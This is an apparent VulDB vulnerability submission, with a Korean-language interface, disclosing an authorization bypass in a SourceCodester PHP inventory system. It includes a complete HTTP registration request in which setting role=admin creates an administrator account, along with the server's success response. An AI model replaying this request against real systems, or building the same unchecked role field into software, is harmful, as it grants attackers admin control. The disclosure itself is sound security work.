| 제목 | SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass |
|---|
| 설명 | During the assessment of the application it was observed that the code developer has missed a very critical path during the account creation. As the application allows to create accounts for the staff, there is a ROLE parameter when set to admin bypasses the restrction and creates the staff account by migrating it to admin.
For example:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Length: 84
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/Product_Inventory/register.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=4k1d9iv3r8rfq72isu5j3utogq
Connection: keep-alive
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=staff // VULNERABLE
Changing the above to the following creates an admin account.
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=admin // VULNERABLE
While the response that is received is 200 and the account is created successfully.
{"success":true,"message":"User registered successfully!"} |
|---|
| 사용자 | Kamran Saifullah (UID 4218) |
|---|
| 제출 | 2026. 05. 24. AM 08:56 (16 날 ago) |
|---|
| 모더레이션 | 2026. 06. 07. PM 06:01 (14 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 369139 [SourceCodester Inventory System 1.0 Account Creation users_handler.php ROLE 권한 상승] |
|---|
| 포인트들 | 17 |
|---|